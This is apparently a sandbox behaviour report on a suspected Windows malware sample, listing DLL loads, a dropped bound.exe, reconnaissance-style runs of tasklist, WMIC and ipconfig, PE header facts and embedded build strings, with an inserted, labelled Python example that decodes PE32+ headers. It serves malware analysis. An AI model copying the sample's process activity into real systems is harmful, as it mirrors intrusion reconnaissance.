                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
                Source: C:\Windows\System32\cmd.exe Section loaded: apphelp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
                Source: C:\Users\user\AppData\Local\Temp\bound.exe Section loaded: mscoree.dll
                Source: C:\Users\user\AppData\Local\Temp\bound.exe Section loaded: apphelp.dll
                Source: C:\Users\user\AppData\Local\Temp\bound.exe Section loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Local\Temp\bound.exe Section loaded: version.dll
                Source: C:\Users\user\AppData\Local\Temp\bound.exe Section loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\AppData\Local\Temp\bound.exe Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Local\Temp\bound.exe Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Local\Temp\bound.exe Section loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Local\Temp\bound.exe Section loaded: dnsapi.dll
                Source: C:\Users\user\AppData\Local\Temp\bound.exe Section loaded: dhcpcsvc6.dll
                Source: C:\Users\user\AppData\Local\Temp\bound.exe Section loaded: dhcpcsvc.dll
                Source: C:\Users\user\AppData\Local\Temp\bound.exe Section loaded: winnsi.dll
                Source: C:\Users\user\AppData\Local\Temp\bound.exe Section loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Local\Temp\bound.exe Section loaded: wldp.dll
                Source: C:\Users\user\AppData\Local\Temp\bound.exe Section loaded: profapi.dll
                Source: C:\Users\user\AppData\Local\Temp\bound.exe Section loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Local\Temp\bound.exe Section loaded: rsaenh.dll
                Source: C:\Users\user\AppData\Local\Temp\bound.exe Section loaded: cryptbase.dll
                Source: C:\Users\user\AppData\Local\Temp\bound.exe Section loaded: rasapi32.dll
                Source: C:\Users\user\AppData\Local\Temp\bound.exe Section loaded: rasman.dll
                Source: C:\Users\user\AppData\Local\Temp\bound.exe Section loaded: rtutils.dll
                Source: C:\Users\user\AppData\Local\Temp\bound.exe Section loaded: mswsock.dll
                Source: C:\Users\user\AppData\Local\Temp\bound.exe Section loaded: winhttp.dll
                Source: C:\Users\user\AppData\Local\Temp\bound.exe Section loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\AppData\Local\Temp\bound.exe Section loaded: rasadhlp.dll
                Source: C:\Users\user\AppData\Local\Temp\bound.exe Section loaded: fwpuclnt.dll
                Source: C:\Users\user\AppData\Local\Temp\bound.exe Section loaded: secur32.dll
                Source: C:\Users\user\AppData\Local\Temp\bound.exe Section loaded: sspicli.dll
                Source: C:\Users\user\AppData\Local\Temp\bound.exe Section loaded: schannel.dll
                Source: C:\Users\user\AppData\Local\Temp\bound.exe Section loaded: mskeyprotect.dll
                Source: C:\Users\user\AppData\Local\Temp\bound.exe Section loaded: ntasn1.dll
                Source: C:\Users\user\AppData\Local\Temp\bound.exe Section loaded: ncrypt.dll
                Source: C:\Users\user\AppData\Local\Temp\bound.exe Section loaded: ncryptsslp.dll
                Source: C:\Users\user\AppData\Local\Temp\bound.exe Section loaded: msasn1.dll
                Source: C:\Users\user\AppData\Local\Temp\bound.exe Section loaded: gpapi.dll
                Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll
                Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll
                Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll
                Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll
                Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
                Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll
                Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll
                Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
                Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll
                Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll
                Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll
                Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll
                Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll
                Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll
                Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll
                Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll
                Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll
                Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll
                Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll
                Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll
                Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll
                Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll
                Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll
                Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll
                Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll
                Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll
                Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll
                Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll
                Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll
                Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll
                Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll
                Source: C:\Windows\System32\ipconfig.exe Section loaded: iphlpapi.dll
                Source: C:\Windows\System32\ipconfig.exe Section loaded: dhcpcsvc.dll
                Source: C:\Windows\System32\ipconfig.exe Section loaded: dhcpcsvc6.dll
                Source: C:\Windows\System32\ipconfig.exe Section loaded: dnsapi.dll
                Source: C:\Windows\System32\ipconfig.exe Section loaded: winnsi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mpclient.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: version.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: msasn1.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wmitomi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: gpapi.dll
                Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: mpclient.dll
                Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: secur32.dll
                Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: sspicli.dll
                Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: version.dll
                Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: msasn1.dll
                Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: kernel.appcore.dll
                Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: userenv.dll
                Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: gpapi.dll
                Source: C:\Users\user\AppData\Local\Temp\bound.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                Source: Window Recorder Window detected: More than 3 window changes detected
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe Static PE information: Image base 0x140000000 > 0x60000000
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe Static file information: File size 8240610 > 1048576
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
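The "Static PE information" lines above are read straight out of the PE32+ optional header: the ImageBase field (compared against 0x60000000), the DllCharacteristics bit field (HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF and TERMINAL_SERVER_AWARE are five of its bits) and the data directory table, whose non-empty entries give the IMAGE_DIRECTORY_ENTRY_* list. The script below is an added example, not part of the Joe Sandbox report, showing how those three kinds of line are produced. It parses a PE32+ header it constructs itself: the image base, the five mitigation flags and the six populated directories reproduce the values the report states, while the timestamp, section count, directory RVAs and every other field are made up and are not the sample's real header.

```python
"""Added example (not part of the Joe Sandbox report): decode the PE32+ fields
behind the "Static PE information" lines, from a header this script constructs.
Only image base, DllCharacteristics and the populated directories reproduce the
report; all other header values are made up."""
import struct
from typing import Dict, List

PE32PLUS_MAGIC = 0x20B

# IMAGE_DLLCHARACTERISTICS_* bits from the PE/COFF specification.
DLL_CHARACTERISTICS = {
    0x0020: "HIGH_ENTROPY_VA", 0x0040: "DYNAMIC_BASE", 0x0080: "FORCE_INTEGRITY",
    0x0100: "NX_COMPAT", 0x0200: "NO_ISOLATION", 0x0400: "NO_SEH",
    0x0800: "NO_BIND", 0x1000: "APPCONTAINER", 0x2000: "WDM_DRIVER",
    0x4000: "GUARD_CF", 0x8000: "TERMINAL_SERVER_AWARE",
}

# IMAGE_DIRECTORY_ENTRY_* names in table order.
DATA_DIRECTORIES = [
    "EXPORT", "IMPORT", "RESOURCE", "EXCEPTION", "SECURITY", "BASERELOC",
    "DEBUG", "ARCHITECTURE", "GLOBALPTR", "TLS", "LOAD_CONFIG", "BOUND_IMPORT",
    "IAT", "DELAY_IMPORT", "COM_DESCRIPTOR", "RESERVED",
]


def parse_pe64_header(data: bytes) -> Dict[str, object]:
    """Walk DOS header -> PE signature -> COFF header -> PE32+ optional header."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew, = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    machine, nsections, timestamp, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20                       # COFF file header is 20 bytes
    magic, = struct.unpack_from("<H", data, opt)
    if magic != PE32PLUS_MAGIC:
        raise ValueError("only PE32+ is handled here (magic 0x%x)" % magic)
    image_base, = struct.unpack_from("<Q", data, opt + 24)   # 64-bit in PE32+
    dll_chars, = struct.unpack_from("<H", data, opt + 70)
    n_dirs, = struct.unpack_from("<I", data, opt + 108)
    present: List[str] = []
    for i in range(min(n_dirs, len(DATA_DIRECTORIES))):
        rva, size = struct.unpack_from("<II", data, opt + 112 + 8 * i)
        if rva and size:                  # an empty entry has both fields zero
            present.append(DATA_DIRECTORIES[i])
    flags = [name for bit, name in sorted(DLL_CHARACTERISTICS.items()) if dll_chars & bit]
    return {
        "machine": machine,
        "sections": nsections,
        "timestamp": timestamp,
        "image_base": image_base,
        "high_image_base": image_base > 0x60000000,   # the report's comparison
        "dll_characteristics": flags,
        "data_directories": present,
    }


def build_sample_header() -> bytes:
    """Constructed PE32+ header carrying the report's values; no sections or code."""
    e_lfanew = 0x80
    hdr = bytearray(e_lfanew)
    hdr[:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, e_lfanew)
    hdr += b"PE\0\0"
    # COFF: AMD64, 6 sections, made-up timestamp, no symbols, 240-byte optional
    # header, Characteristics = EXECUTABLE_IMAGE | LARGE_ADDRESS_AWARE.
    hdr += struct.pack("<HHIIIHH", 0x8664, 6, 0x66F0A1B2, 0, 0, 112 + 16 * 8, 0x0022)
    hdr += struct.pack(
        "<HBBIIIIIQIIHHHHHHIIIIHHQQQQII",
        PE32PLUS_MAGIC, 14, 0,                 # magic, linker 14.0
        0x1000, 0x2000, 0, 0x1234, 0x1000,     # code/data sizes, entry point, base of code
        0x140000000,                           # ImageBase, as reported
        0x1000, 0x200, 6, 0, 0, 0, 6, 0, 0,    # alignments, OS/image/subsystem versions, reserved
        0x10000, 0x400, 0,                     # SizeOfImage, SizeOfHeaders, CheckSum
        2,                                     # Subsystem: WINDOWS_GUI
        0x0020 | 0x0040 | 0x0100 | 0x4000 | 0x8000,   # the five flags in the report
        0x100000, 0x1000, 0x100000, 0x1000,    # stack/heap reserve and commit
        0, 16,                                 # LoaderFlags, NumberOfRvaAndSizes
    )
    dirs = [(0, 0)] * 16
    for name in ("IMPORT", "RESOURCE", "BASERELOC", "DEBUG", "LOAD_CONFIG", "IAT"):
        idx = DATA_DIRECTORIES.index(name)
        dirs[idx] = (0x5000 + 0x100 * idx, 0x40)   # made-up RVAs and sizes
    for rva, size in dirs:
        hdr += struct.pack("<II", rva, size)
    return bytes(hdr)


if __name__ == "__main__":
    info = parse_pe64_header(build_sample_header())
    print("Image base 0x%x > 0x60000000: %s" % (info["image_base"], info["high_image_base"]))
    print(", ".join(info["dll_characteristics"]))
    for name in info["data_directories"]:
        print("data directory type: IMAGE_DIRECTORY_ENTRY_" + name)
```

To run the same decode against a real file, replace build_sample_header() with the file's first few kilobytes; the parser deliberately refuses PE32 (magic 0x10B) images, where ImageBase is a 32-bit field at a different offset and the directory table starts 16 bytes earlier. Note that the presence of a DEBUG directory says nothing about whether debug information is still attached, only that the loader can find a debug directory entry, which is where the PDB paths listed below come from.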
                Source: Binary string: System.Data.pdb source: WER40B.tmp.dmp.29.dr
                Source: Binary string: mscorlib.pdb8* source: WER40B.tmp.dmp.29.dr
                Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: bound.exe, 00000011.00000002.1605507236.00000254B6D83000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: System.Windows.Forms.ni.pdb source: WER40B.tmp.dmp.29.dr
                Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"OpenSSL 3.0.15 3 Sep 20243.0.15built on: Wed Sep 4 15:52:04 2024 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL || WITHIN_ARENA(temp->next)assertion failed: (char **)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) || WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != 
NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/*0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_p
                Source: Binary string: System.Drawing.ni.pdb source: WER40B.tmp.dmp.29.dr
                Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER40B.tmp.dmp.29.dr
                Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1469630464.00007FF8E6B32000.00000040.00000001.01000000.0000000F.sdmp
                Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1387564300.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1499835574.00007FF8F8754000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
                Source: Binary string: System.Drawing.ni.pdbRSDS source: WER40B.tmp.dmp.29.dr
                Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\bound.PDB] source: bound.exe, 00000011.00000002.1610583580.00000254CF206000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Xml.ni.pdbRSDS# source: WER40B.tmp.dmp.29.dr
                Source: Binary string: System.Core.ni.pdb source: WER40B.tmp.dmp.29.dr
                Source: Binary string: System.Numerics.ni.pdb source: WER40B.tmp.dmp.29.dr
                Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1499519391.00007FF8F8301000.00000040.00000001.01000000.00000006.sdmp
                Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1493380127.00007FF8E80D1000.00000040.00000001.01000000.00000011.sdmp
                Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WER40B.tmp.dmp.29.dr
                Source: Binary string: mscorlib.ni.pdb source: WER40B.tmp.dmp.29.dr
                Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1498932456.00007FF8E83BB000.00000040.00000001.01000000.00000008.sdmp
                Source: Binary string: System.Core.pdb source: WER40B.tmp.dmp.29.dr
                Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1499164616.00007FF8F0D01000.00000040.00000001.01000000.00000009.sdmp
                Source: Binary string: System.Xml.pdbX`h0a source: WER40B.tmp.dmp.29.dr
                Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1496149556.00007FF8E8131000.00000040.00000001.01000000.0000000C.sdmp
